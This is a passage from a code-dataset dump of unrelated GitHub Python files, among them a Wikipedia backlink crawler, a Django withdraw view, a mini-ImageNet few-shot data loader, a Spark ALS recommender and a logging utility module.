measurement')\n","repo_name":"sgatana/my-shopping-tracker","sub_path":"app/api/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36003423357","text":"import sys\n\nimport requests\n\n\ndef loose_starting_title(title, cont=None):\n url = 'https://en.wikipedia.org/w/api.php?action=query&list=backlinks&format=json&bltitle='+title+'&bllimit=max'\n if cont:\n url += \"&blcontinue=%s\" % cont\n r = requests.get(url)\n backlinks = r.json()\n for link in backlinks['query']['backlinks']:\n yield link['title']\n if \"continue\" in backlinks:\n for link in loose_starting_title(title, cont=backlinks['continue']['blcontinue']):\n yield link\n \nseen_pages = set()\n\ndef store_backlink_value(title, rest_of_chain=()):\n rest_of_chain = rest_of_chain\n for link in loose_starting_title(title):\n if link not in seen_pages:\n yield link, (title, ) + rest_of_chain\n seen_pages.add(link)\n\n\nif __name__ == '__main__':\n \n previous_relations = [(\"Jesus\", ())]\n while True:\n next_relations = []\n for from_page, to_pages in previous_relations:\n for new_from, new_to_pages in store_backlink_value(from_page, to_pages):\n next_relations.append((from_page, to_pages))\n next_steps = \" => \".join(new_to_pages)\n print(\"%s => %s\" % (new_from, next_steps))\n previous_relations = next_relations\n \n\n\n\n\n #for link in loose_starting_title('Jesus'):\n # print(link)\n \n\n\n\n","repo_name":"stestagg/hackthewiki","sub_path":"loosejesus.py","file_name":"loosejesus.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42726360129","text":"test = list()\r\ntest.append('Alex')\r\ntest.append(21)\r\ngalera = list()\r\ngalera.append(test[:])\r\ntest[0] = 'Maria'\r\ntest[1] = 22\r\ngalera.append(test[:])\r\nprint(galera)\r\n\r\ntodos = [['Joao', 19], ['Ana', 33], ['Joaquim', 13], ['Maria', 45]]\r\nprint(todos)\r\nprint(todos[0][0])\r\nfor p in todos:\r\n print(f'{p[0]}, tem {p[1]} anos de idade!')\r\n\r\npessoal = list()\r\ndado = list()\r\nfor c in range(0,3):\r\n dado.append(str(input('Nome: ')))\r\n dado.append(int(input('Idade: ')))\r\n pessoal.append(dado[:])\r\n dado.clear()\r\nprint(pessoal)\r\ntotmaior = totmenor = 0\r\nfor p in pessoal:\r\n if p[1] >= 21:\r\n print(f'{p[0]} é maior de idade!')\r\n totmaior += 1\r\n else:\r\n print(f'{p[0]} é menor de idade!')\r\n totmenor += 1\r\nprint(f'Temos {totmaior} maiores e {totmenor} menor de idade!')","repo_name":"Alex-Carrijo/Curso_Em_Videos_Treino","sub_path":"aula_Lista2.py","file_name":"aula_Lista2.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44404772264","text":"import logging\nfrom django.http import HttpResponse\nfrom django.views import View\n\nfrom demo.utils import LockedAtomicTransaction\nfrom .models import Account, Transaction\nlogger = logging.getLogger(\"django\")\n\n\nclass WithdrawView(View):\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated:\n holder = Account.objects.filter(user=request.user).first()\n current = holder.current\n return HttpResponse(current)\n return HttpResponse(\"\")\n\n def post(self, request, *args, **kwargs):\n with LockedAtomicTransaction(Account):\n holder = Account.objects.filter(user=request.user).first()\n withdrawl = 1\n current = holder.make_withdrawl(withdrawl)\n Transaction.objects.create(\n holder=holder,\n balance=current,\n transaction=withdrawl\n )\n\n return HttpResponse(current)\n","repo_name":"wrdeman/django_logstash_elasticsearch","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4634096047","text":"size = int(input(\"size of list \"))\nUserList = [int(input(\"Enter element \")) for i in range(0,size)]\n\ndef Min(UserList):\n if len(UserList) ==1:\n return UserList[0]\n else:\n number = Min(UserList[1:])\n if number < UserList[0]:\n return number\n else:\n return UserList[0]\n\nprint(Min(UserList))\n","repo_name":"viplash4/AmisHomework","sub_path":"дз рекурсія/recursion task1.py","file_name":"recursion task1.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26259969067","text":"import glob\nimport json\nimport os\n\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\nimport tqdm\nimport concurrent.futures\nimport pickle\nimport torch\nfrom torchvision import transforms\nfrom PIL import ImageFile\n\nfrom data.data_processing.augment import augment_image\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\nclass MiniImagenetDataset(Dataset):\n def __init__(self, config, mode):\n \"\"\"\n A data provider class inheriting from Pytorch's Dataset class. It takes care of creating task sets for\n our few-shot learning model training and evaluation\n :param config: Arguments in the form of a Bunch object. Includes all hyperparameters necessary for the\n data-provider. For transparency and readability reasons to explicitly set as self.object_name all arguments\n required for the data provider, such that the reader knows exactly what is necessary for the data provider/\n \"\"\"\n self.config = config\n self.mode = mode\n self.data_loaded_in_memory = False\n\n self.index = 0\n\n self.augment_images = False\n\n self.datasets = self.load_dataset()\n\n self.indexes = 0\n self.dataset_size_dict = {key: len(self.datasets[key]) for key in list(self.datasets.keys())}\n self.label_set = self.get_label_set()\n self.data_length = np.sum([len(self.datasets[key]) for key in self.datasets.keys()])\n\n print(\"data\", self.data_length)\n self.observed_seed_set = None\n\n def set_random_state(self):\n train_rng = np.random.RandomState(seed=self.config.train_seed)\n train_seed = train_rng.randint(1, 999999)\n self.config.train_seed = train_seed\n self.init_seed = self.config.train_seed\n self.seed = self.config.train_seed\n\n def load_dataset(self):\n \"\"\"\n Loads a dataset's dictionary files.\n in the config object.\n :return: The current dataset\n \"\"\"\n # rng = np.random.RandomState(seed=self.seed['val'])\n\n data_image_paths, index_to_label_name_dict_file, label_to_index = self.load_datapaths()\n\n if self.config.load_into_memory:\n print(f\"Loading {self.mode} data into RAM\")\n\n x_loaded = {key: np.zeros(len(value), ) for key, value in data_image_paths.items()}\n with tqdm.tqdm(total=len(data_image_paths)) as pbar_memory_load:\n with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:\n # Process the list of files, but split the work across the process pool to use all CPUs!\n # self.config = SimpleNamespace(**self.config.dict())\n for (class_label, class_images_loaded) in executor.map(self.load_parallel_batch,\n (data_image_paths.items())):\n x_loaded[class_label] = class_images_loaded\n pbar_memory_load.update(1)\n\n data_image_paths = x_loaded\n self.data_loaded_in_memory = True\n\n return data_image_paths\n\n def load_datapaths(self):\n \"\"\"\n If saved json dictionaries of the data are available, then this method loads the dictionaries such that the\n data is ready to be read. If the json dictionaries do not exist, then this method calls get_data_paths()\n which will build the json dictionary containing the class to filepath samples, and then store them.\n :return: data_image_paths: dict containing class to filepath list pairs.\n index_to_label_name_dict_file: dict containing numerical indexes mapped to the human understandable\n string-names of the class\n label_to_index: dictionary containing human understandable string mapped to numerical indexes\n \"\"\"\n dataset_dir = 'dataset_files/mini_imagenet'\n data_path_file = f\"{dataset_dir}/{self.mode}_mini_imagenet_full_size.json\"\n self.index_to_label_name_dict_file = f\"{dataset_dir}/{self.mode}_map_to_label_name_mini_imagenet_full_size.json\"\n self.label_name_to_map_dict_file = f\"{dataset_dir}/{self.mode}_label_name_to_map_mini_imagenet_full_size.json\"\n\n try:\n data_image_paths = self.load_from_json(filename=data_path_file)\n label_to_index = self.load_from_json(filename=self.label_name_to_map_dict_file)\n index_to_label_name_dict_file = self.load_from_json(filename=self.index_to_label_name_dict_file)\n return data_image_paths, index_to_label_name_dict_file, label_to_index\n except:\n print(\"Mapped data paths can't be found, remapping paths..\")\n data_image_paths, code_to_label_name, label_name_to_code = self.get_data_paths()\n self.save_to_json(dict_to_store=data_image_paths, filename=data_path_file)\n self.save_to_json(dict_to_store=code_to_label_name, filename=self.index_to_label_name_dict_file)\n self.save_to_json(dict_to_store=label_name_to_code, filename=self.label_name_to_map_dict_file)\n return self.load_datapaths()\n\n def save_to_json(self, filename, dict_to_store):\n with open(os.path.abspath(filename), 'w') as f:\n json.dump(dict_to_store, fp=f)\n\n def load_from_json(self, filename):\n with open(filename, mode=\"r\") as f:\n load_dict = json.load(fp=f)\n\n return load_dict\n\n def get_data_paths(self):\n \"\"\"\n Method that scans the dataset directory and generates class to image-filepath list dictionaries.\n :return: data_image_paths: dict containing class to filepath list pairs.\n index_to_label_name_dict_file: dict containing numerical indexes mapped to the human understandable\n string-names of the class\n label_to_index: dictionary containing human understandable string mapped to numerical indexes\n \"\"\"\n path_template = os.path.join(self.config.dataset_path, self.mode, '*', '*.jpg')\n print(\"Get images in a form: \", path_template)\n paths = sorted(glob.glob(path_template))\n data_image_path_list_raw = [os.path.abspath(path) for path in paths]\n labels = sorted({self.get_label_from_path(path) for path in data_image_path_list_raw})\n\n idx_to_label_name = {idx: label for idx, label in enumerate(labels)}\n label_name_to_idx = {label: idx for idx, label in enumerate(labels)}\n data_image_path_dict = {idx: [] for idx in list(idx_to_label_name.keys())}\n with tqdm.tqdm(total=len(data_image_path_list_raw)) as pbar_error:\n # Process the list of files and put them into a dictionary of classes with the list of the image paths\n for image_file in data_image_path_list_raw:\n pbar_error.update(1)\n label = self.get_label_from_path(image_file)\n data_image_path_dict[label_name_to_idx[label]].append(image_file)\n\n return data_image_path_dict, idx_to_label_name, label_name_to_idx\n\n def get_label_set(self):\n \"\"\"\n Generates a set containing all class numerical indexes\n :return: A set containing all class numerical indexes\n \"\"\"\n index_to_label_name_dict_file = self.load_from_json(filename=self.index_to_label_name_dict_file)\n return set(list(index_to_label_name_dict_file.keys()))\n\n def get_index_from_label(self, label):\n \"\"\"\n Given a class's (human understandable) string, returns the numerical index of that class\n :param label: A string of a human understandable class contained in the dataset\n :return: An int containing the numerical index of the given class-string\n \"\"\"\n label_to_index = self.load_from_json(filename=self.label_name_to_map_dict_file)\n return label_to_index[label]\n\n def get_label_from_index(self, index):\n \"\"\"\n Given an index return the human understandable label mapping to it.\n :param index: A numerical index (int)\n :return: A human understandable label (str)\n \"\"\"\n index_to_label_name = self.load_from_json(filename=self.index_to_label_name_dict_file)\n return index_to_label_name[index]\n\n def get_label_from_path(self, filepath):\n \"\"\"\n Given a path of an image generate the human understandable label for that image.\n :param filepath: The image's filepath\n :return: A human understandable label.\n \"\"\"\n label_bits = filepath.split(\"/\")\n label = \"/\".join([label_bits[idx] for idx in self.config.indexes_of_folders_indicating_class])\n if self.config.labels_as_int:\n label = int(label)\n return label\n\n def load_image(self, image_path):\n \"\"\"\n Given an image filepath and the number of channels to keep, load an image and keep the specified channels\n :param image_path: The image's filepath\n :return: An image array of shape (h, w, channels), whose values range between 0.0 and 1.0.\n \"\"\"\n if not self.data_loaded_in_memory:\n image = Image.open(image_path)\n image = image.resize(self.config.input_size).convert('RGB')\n image = np.array(image, np.float32)\n image = image / 255.0\n else:\n image = image_path\n\n return image\n\n def load_parallel_batch(self, inputs):\n \"\"\"\n Load a batch of images, given a list of filepaths\n :return: A numpy array of images of shape batch, height, width, channels\n \"\"\"\n class_label, batch_image_paths = inputs\n image_batch = []\n\n if self.data_loaded_in_memory:\n for image_path in batch_image_paths:\n image_batch.append(np.copy(image_path))\n image_batch = np.array(image_batch, dtype=np.float32)\n else:\n image_batch = [self.load_image(image_path=image_path) for image_path in batch_image_paths]\n image_batch = np.array(image_batch, dtype=np.float32)\n image_batch = self.preprocess_data(image_batch)\n\n return class_label, image_batch\n\n def preprocess_data(self, x):\n \"\"\"\n Preprocesses data such that their shapes match the specified structures\n :param x: A data batch to preprocess\n :return: A preprocessed data batch\n \"\"\"\n x_shape = x.shape\n x = np.reshape(x, (-1, x_shape[-3], x_shape[-2], x_shape[-1]))\n if self.config.reverse_channels is True:\n reverse_photos = np.ones(shape=x.shape)\n for channel in range(x.shape[-1]):\n reverse_photos[:, :, :, x.shape[-1] - 1 - channel] = x[:, :, :, channel]\n x = reverse_photos\n x = x.reshape(x_shape)\n return x\n\n def reconstruct_original(self, x):\n \"\"\"\n Applies the reverse operations that preprocess_data() applies such that the data returns to their original form\n :param x: A batch of data to reconstruct\n :return: A reconstructed batch of data\n \"\"\"\n x = x * 255.0\n return x\n\n def get_set(self, seed, augment_images=False):\n \"\"\"\n Generates a task-set to be used for training or evaluation\n :param set_name: The name of the set to use, e.g. \"train\", \"val\" etc.\n :return: A task-set containing an image and label support set, and an image and label target set.\n \"\"\"\n # seed = seed % self.config.total_unique_tasks\n rng = np.random.RandomState(seed)\n selected_classes = rng.choice(list(self.dataset_size_dict.keys()),\n size=self.config.num_samples_per_class, replace=False)\n rng.shuffle(selected_classes)\n k_list = rng.randint(0, 4, size=self.config.num_samples_per_class)\n k_dict = {selected_class: k_item for (selected_class, k_item) in zip(selected_classes, k_list)}\n episode_labels = [i for i in range(self.config.num_samples_per_class)]\n class_to_episode_label = {selected_class: episode_label for (selected_class, episode_label) in\n zip(selected_classes, episode_labels)}\n\n x_images = []\n y_labels = []\n\n for class_entry in selected_classes:\n choose_samples_list = rng.choice(self.dataset_size_dict[class_entry],\n size=self.config.num_samples_per_class + self.config.num_target_samples,\n replace=False)\n class_image_samples = []\n class_labels = []\n for sample in choose_samples_list:\n choose_samples = self.datasets[class_entry][sample]\n _, x_class_data = self.load_parallel_batch([None, choose_samples])[0]\n k = k_dict[class_entry]\n x_class_data = augment_image(image=x_class_data, k=k,\n channels=self.image_channel, augment_bool=augment_images,\n dataset_name=self.dataset_name, config=self.config)\n class_image_samples.append(x_class_data)\n class_labels.append(int(class_to_episode_label[class_entry]))\n class_image_samples = torch.stack(class_image_samples)\n x_images.append(class_image_samples)\n y_labels.append(class_labels)\n\n x_images = torch.stack(x_images)\n y_labels = np.array(y_labels, dtype=np.float32)\n\n support_set_images = x_images[:, :self.config.num_samples_per_class]\n support_set_labels = y_labels[:, :self.config.num_samples_per_class]\n target_set_images = x_images[:, self.config.num_samples_per_class:]\n target_set_labels = y_labels[:, self.config.num_samples_per_class:]\n\n return support_set_images, target_set_images, support_set_labels, target_set_labels, seed\n\n def __len__(self):\n return self.data_length // self.config.batch_size\n\n def set_augmentation(self, augment_images):\n self.augment_images = augment_images\n\n def switch_set(self, current_iter=None):\n if self.mode == \"train\":\n self.update_seed(seed=self.init_seed + current_iter)\n\n def update_seed(self, seed=100):\n self.seed = seed\n\n def __getitem__(self, idx):\n support_set_images, target_set_image, support_set_labels, target_set_label, seed = \\\n self.get_set(seed=self.seed + idx, augment_images=self.augment_images)\n\n return support_set_images, target_set_image, support_set_labels, target_set_label, seed\n\n# class MetaLearningSystemDataLoader(object):\n# def __init__(self, config, current_iter=0):\n# \"\"\"\n# Initializes a meta learning system dataloader. The data loader uses the Pytorch DataLoader class to parallelize\n# batch sampling and preprocessing.\n# :param config: An arguments NamedTuple containing all the required arguments.\n# :param current_iter: Current iter of experiment. Is used to make sure the data loader continues where it left\n# of previously.\n# \"\"\"\n# self.num_of_gpus = config.num_of_gpus\n# self.batch_size = config.batch_size\n# self.samples_per_iter = config.samples_per_iter\n# self.num_workers = config.num_dataprovider_workers\n# self.total_train_iters_produced = 0\n# self.dataset = MiniImagenetDataset(config=config)\n# self.batches_per_iter = config.samples_per_iter\n# self.full_data_length = self.dataset.data_length\n# self.continue_from_iter(current_iter=current_iter)\n# self.config = config\n#\n# def get_dataloader(self):\n# \"\"\"\n# Returns a data loader with the correct set (train, val or test), continuing from the current iter.\n# :return:\n# \"\"\"\n# return DataLoader(self.dataset, batch_size=(self.num_of_gpus * self.batch_size * self.samples_per_iter),\n# shuffle=False, num_workers=self.num_workers, drop_last=True)\n#\n# def continue_from_iter(self, current_iter):\n# \"\"\"\n# Makes sure the data provider is aware of where we are in terms of training iterations in the experiment.\n# :param current_iter:\n# \"\"\"\n# self.total_train_iters_produced += (current_iter * (self.num_of_gpus * self.batch_size * self.samples_per_iter))\n#\n# def get_train_batches(self, total_batches=-1, augment_images=False):\n# \"\"\"\n# Returns a training batches data_loader\n# :param total_batches: The number of batches we want the data loader to sample\n# :param augment_images: Whether we want the images to be augmented.\n# \"\"\"\n# if total_batches == -1:\n# self.dataset.data_length = self.full_data_length\n# else:\n# self.dataset.data_length[\"train\"] = total_batches * self.dataset.batch_size\n# self.dataset.switch_set(set_name=\"train\", current_iter=self.total_train_iters_produced)\n# self.dataset.set_augmentation(augment_images=augment_images)\n# self.total_train_iters_produced += (self.num_of_gpus * self.batch_size * self.samples_per_iter)\n# for sample_id, sample_batched in enumerate(self.get_dataloader()):\n# yield sample_batched\n#\n# def get_val_batches(self, total_batches=-1, augment_images=False):\n# \"\"\"\n# Returns a validation batches data_loader\n# :param total_batches: The number of batches we want the data loader to sample\n# :param augment_images: Whether we want the images to be augmented.\n# \"\"\"\n# if total_batches == -1:\n# self.dataset.data_length = self.full_data_length\n# else:\n# self.dataset.data_length['val'] = total_batches * self.dataset.batch_size\n# self.dataset.switch_set(set_name=\"val\")\n# self.dataset.set_augmentation(augment_images=augment_images)\n# for sample_id, sample_batched in enumerate(self.get_dataloader()):\n# yield sample_batched\n#\n# def get_test_batches(self, total_batches=-1, augment_images=False):\n# \"\"\"\n# Returns a testing batches data_loader\n# :param total_batches: The number of batches we want the data loader to sample\n# :param augment_images: Whether we want the images to be augmented.\n# \"\"\"\n# if total_batches == -1:\n# self.dataset.data_length = self.full_data_length\n# else:\n# self.dataset.data_length['test'] = total_batches * self.dataset.batch_size\n# self.dataset.switch_set(set_name='test')\n# self.dataset.set_augmentation(augment_images=augment_images)\n# for sample_id, sample_batched in enumerate(self.get_dataloader()):\n# yield sample_batched\n","repo_name":"gregiberri/meta_learning","sub_path":"data/datasets/mini_imagenet.py","file_name":"mini_imagenet.py","file_ext":"py","file_size_in_byte":18771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"40085073427","text":"import pytube\n\n\ndef main():\n while True:\n url = input(\"Url do Vídeo: \")\n yt = pytube.YouTube(url)\n print(f\"Titulo do Vídeo: {yt.title}\")\n stream = yt.streams.get_highest_resolution()\n print(\"BAIXANDO VIDEO...\")\n stream.download()\n print(\"Vídeo baixado, confira na sua pasta.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"matheustxaguiar/video-downloader","sub_path":"videodownloader.py","file_name":"videodownloader.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35928740979","text":"def s(n):\n ret = 0\n while n > 0:\n ret += n % 10\n n //= 10\n return ret\n\nans = 0\nN, A, B = map(int, input().split())\n\nfor i in range(N+1):\n if A <= s(i) <= B:\n ans += i\n\nprint(ans)","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/abc083_b.py","file_name":"abc083_b.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7431596519","text":"\"\"\"model update\n\nRevision ID: c80cb90f0a1a\nRevises: 8e097ae60858\nCreate Date: 2022-11-19 22:17:06.065596\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c80cb90f0a1a'\ndown_revision = '8e097ae60858'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('comments', 'post_time')\n op.drop_column('comments', 'poster_name')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('comments', sa.Column('poster_name', sa.VARCHAR(), autoincrement=False, nullable=False))\n op.add_column('comments', sa.Column('post_time', sa.VARCHAR(), autoincrement=False, nullable=False))\n # ### end Alembic commands ###\n","repo_name":"19alema/flask-blog-app","sub_path":"migrations/versions/c80cb90f0a1a_model_update.py","file_name":"c80cb90f0a1a_model_update.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34337003413","text":"import uuid\n\nimport pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\n\nfrom api.main import app as fastapi_instance\nfrom config.api_config import ApiConfig\nfrom modules.iam.application.services import IamService\nfrom seedwork.infrastructure.database import Base\n\n\n@pytest.fixture\ndef engine():\n config = ApiConfig()\n eng = create_engine(config.DATABASE_URL, echo=config.DATABASE_ECHO)\n\n with eng.begin() as connection:\n Base.metadata.drop_all(connection)\n Base.metadata.create_all(connection)\n return eng\n\n\n@pytest.fixture\ndef db_session(engine):\n with Session(engine) as session:\n yield session\n\n\n@pytest.fixture\ndef api():\n return fastapi_instance\n\n\n@pytest.fixture\ndef api_client(api, app):\n client = TestClient(api)\n return client\n\n\n@pytest.fixture\ndef authenticated_api_client(api, app):\n access_token = uuid.uuid4()\n with app.transaction_context() as ctx:\n iam: IamService = ctx[IamService]\n current_user = iam.create_user(\n uuid.UUID(int=1),\n email=\"user1@example.com\",\n password=\"password\",\n access_token=str(access_token),\n is_superuser=False,\n )\n headers = {\"Authorization\": f\"bearer {access_token}\"}\n client = TestClient(api, headers=headers)\n client.current_user = current_user\n return client\n\n\n@pytest.fixture\ndef app(api, db_session):\n app = api.container.application()\n return app\n","repo_name":"pgorecki/python-ddd","sub_path":"src/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":723,"dataset":"github-code","pt":"35"} +{"seq_id":"28216379078","text":"class Solution:\n def validArrangement(self, pairs):\n from collections import defaultdict\n graf = defaultdict(list)\n gout = defaultdict(int)\n gin = defaultdict(int)\n for x, y in pairs:\n graf[x].append(y)\n gout[x]+=1\n gin[y]+=1\n\n s = pairs[0][0]\n for x in gout:\n if gout[x] == gin[x] +1:\n s = x\n break \n \n rasp = []\n def euler(x):\n while graf[x]:\n euler(graf[x].pop()) \n rasp.append(x)\n\n euler(s)\n rasp.reverse()\n r = [[rasp[i], rasp[i+1]] for i in range(len(rasp)-1)]\n return r\nsol = Solution()\nprint(sol.validArrangement([[5,1],[4,5],[11,9],[9,4]])) \n","repo_name":"Narcis2151/Fundamental-Algorithms","sub_path":"Homework3/E4.py","file_name":"E4.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34447936239","text":"import operator\nimport re\nimport math\nfrom pyspark import SparkContext\nfrom pyspark import SparkConf\nimport pyspark.mllib.recommendation as rd\n\ndef trainValidation(td,vd):\n d = dict()\n for rank in [5,10,15,20,50,100]:\n for it in [5,10,15,20,25]:\n for lam in [0.05,0.1,1.0,5.0,10.0]:\n rmse = trainModel(td,vd,rank,it,lam)\n d[rmse] = (rank,it,lam)\n# {rmse:(rank,it,lam)} rmse is the distance () is the paras\n print(d[min(d)])\n\ndef trainModel (traindata,validationdata,r,i,l):\n model = rd.ALS.train(traindata,r,i,l)\n return computeRmse(model,validationdata)\n\ndef computeRmse(model,validationdata):\n\n predictedRDD = model.predictAll(validationdata.map(lambda x:(x[0],x[1])))\n predictedANDRatings = predictedRDD.map(lambda x:((x[0],x[1]),x[2]))\n \n return math.sqrt(predictedANDRatings.join(validationdata.map(lambda x:((x[0],x[1]),x[2]))).map(lambda x:math.pow((x[1][0]-x[1][1]),2)).reduce(operator.add)/validationdata.count())\n\n\nconf = SparkConf().setAppName(\"miniproject\").setMaster(\"local[*]\")\nsc = SparkContext.getOrCreate(conf)\n\nrdd = sc.textFile(\"/home/simon/Downloads/ml-100k/u1.base\")\n\nrawRatings = rdd.map(lambda line:line.split('\\t')[0:3])\nratings = rawRatings.map(lambda x:rd.Rating(int(x[0]),int(x[1]),float(x[2])))\n\n'''\nmodel = rd.ALS.train(ratings,50,10,0.01)\npredictedRating = model.predict(3,132)\nprint (predictedRating)\ntopKRecs = model.recommendProducts(789, 10)\nprint(topKRecs)\n'''\n\n(traindata,validationdata,testdata) = ratings.randomSplit([0.8,0.1,0.1]) #return traindata validation data, test data\n#traindata.persist(),validationdata,testdata\n\nbestModel = trainValidation(traindata,validationdata)\n\ntestRmse = computeRMSE(bestModel,testdata)\n\n\n","repo_name":"bigDataMLProject/Shrimp_hust","sub_path":"recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9850565598","text":"#!/usr/bin/env python\n# coding=utf-8\nimport sys\nimport os\nimport socket\nimport traceback\nimport logging\nimport logging.handlers\nfrom toughlib import dispatch\nfrom toughlib.utils import safeunicode\nfrom twisted.python import log as txlog\nimport functools\n\nEVENT_TRACE = 'syslog_trace'\nEVENT_INFO = 'syslog_info'\nEVENT_DEBUG = 'syslog_debug'\nEVENT_ERROR = 'syslog_error'\nEVENT_EXCEPTION = 'syslog_exception'\nEVENT_SETUP = 'syslog_setup'\n\n\ndef string_to_level(log_level):\n if log_level == \"CRITICAL\":\n return logging.CRITICAL\n if log_level == \"ERROR\":\n return logging.ERROR\n if log_level == \"WARNING\":\n return logging.WARNING\n if log_level == \"INFO\":\n return logging.INFO\n if log_level == \"DEBUG\":\n return logging.DEBUG\n return logging.NOTSET\n\nclass SimpleLogger:\n\n def __init__(self,config, name=\"toughstruct\"):\n self.name = name\n self.setup(config)\n\n def setup(self, config):\n self.level = string_to_level(config.syslog.level)\n if config.system.debug:\n self.level = string_to_level(\"DEBUG\")\n\n self.log = logging.getLogger(self.name)\n self.log.setLevel(self.level)\n\n handler = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter(u'%(message)s')\n handler.setFormatter(formatter)\n self.log.addHandler(handler)\n\n self.info = self.log.info\n self.debug = self.log.debug\n self.warning = self.log.warning\n self.error = self.log.error\n self.critical = self.log.critical\n self.msg = self.log.info\n self.err = self.log.error\n\n def event_syslog_setup(self,config):\n self.setup(config)\n\n def event_syslog_info(self, msg):\n self.info(msg)\n\n def event_syslog_debug(self, msg):\n self.debug(msg)\n\n def event_syslog_error(self, msg):\n self.error(msg)\n\n def event_syslog_exception(self, err):\n self.log.exception(err) \n\n def emit(self, eventDict):\n text = txlog.textFromEventDict(eventDict)\n if text is None:\n return\n if eventDict['isError'] and 'failure' in eventDict:\n self.error(text)\n else:\n self.info(text)\n\n\nclass Logger:\n\n def __init__(self,config, name=\"toughstruct\"):\n self.name = name\n self.setup(config)\n\n def setup(self, config):\n self.syslog_enable = config.syslog.enable\n self.syslog_server = config.syslog.server\n self.syslog_port = config.syslog.port\n self.syslog_level = config.syslog.level\n self.syslog_shost = config.syslog.shost\n self.formatter = logging.Formatter(\n u'%(asctime)s {0} %(name)s %(levelname)-8s %(message)s'.format(self.syslog_shost),'%b %d %H:%M:%S', )\n self.level = string_to_level(self.syslog_level)\n if config.system.debug:\n self.level = string_to_level(\"DEBUG\")\n\n self.syslogger = logging.getLogger(self.name)\n self.syslogger.setLevel(self.level)\n\n if self.syslog_enable and self.syslog_server:\n handler = logging.handlers.SysLogHandler(address=(self.syslog_server, self.syslog_port))\n handler.setFormatter(self.formatter)\n self.syslogger.addHandler(handler)\n else:\n handler = logging.StreamHandler(sys.stderr)\n formatter = logging.Formatter(u'\\x1b[32;40m[%(asctime)s %(name)s]\\x1b[0m %(message)s','%b %d %H:%M:%S',)\n handler.setFormatter(formatter)\n self.syslogger.addHandler(handler)\n\n self.info = self.syslogger.info\n self.debug = self.syslogger.debug\n self.warning = self.syslogger.warning\n self.error = self.syslogger.error\n self.critical = self.syslogger.critical\n self.log = self.syslogger.log\n self.msg = self.syslogger.info\n self.err = self.syslogger.error\n\n def event_syslog_setup(self,config):\n self.setup(config)\n\n def event_syslog_info(self, msg, **kwargs):\n self.info(msg)\n\n def event_syslog_debug(self, msg, **kwargs):\n self.debug(msg)\n\n def event_syslog_error(self, msg, **kwargs):\n self.error(msg)\n\n def event_syslog_exception(self, err, **kwargs):\n self.syslogger.exception(err)\n\n def emit(self, eventDict):\n text = txlog.textFromEventDict(eventDict)\n if text is None:\n return\n if not isinstance(text, (unicode,str,dict,list)):\n text = text\n else:\n text = safeunicode(text)\n\n if eventDict['isError'] and 'failure' in eventDict:\n self.exception(text)\n else:\n self.info(text)\n\n\nsetup = functools.partial(dispatch.pub, EVENT_SETUP) \n\n\ndef info(message,trace=\"info\",**kwargs):\n if not isinstance(message, unicode):\n message = safeunicode(message)\n if EVENT_INFO in dispatch.dispatch.callbacks:\n dispatch.pub(EVENT_INFO,message,**kwargs)\n if EVENT_TRACE in dispatch.dispatch.callbacks:\n dispatch.pub(EVENT_TRACE,trace,message,**kwargs)\n\n\ndef debug(message,**kwargs):\n if not isinstance(message, unicode):\n message = safeunicode(message)\n if EVENT_DEBUG in dispatch.dispatch.callbacks:\n dispatch.pub(EVENT_DEBUG,message,**kwargs)\n if EVENT_TRACE in dispatch.dispatch.callbacks:\n dispatch.pub(EVENT_TRACE,\"debug\",message,**kwargs)\n\ndef error(message,**kwargs):\n if not isinstance(message, unicode):\n message = safeunicode(message)\n if EVENT_ERROR in dispatch.dispatch.callbacks:\n dispatch.pub(EVENT_ERROR,message,**kwargs)\n if EVENT_TRACE in dispatch.dispatch.callbacks:\n dispatch.pub(EVENT_TRACE,\"error\",message,**kwargs)\n\n\n\ndef exception(err,**kwargs):\n if EVENT_EXCEPTION in dispatch.dispatch.callbacks:\n dispatch.pub(EVENT_EXCEPTION,err,**kwargs)\n if EVENT_TRACE in dispatch.dispatch.callbacks:\n 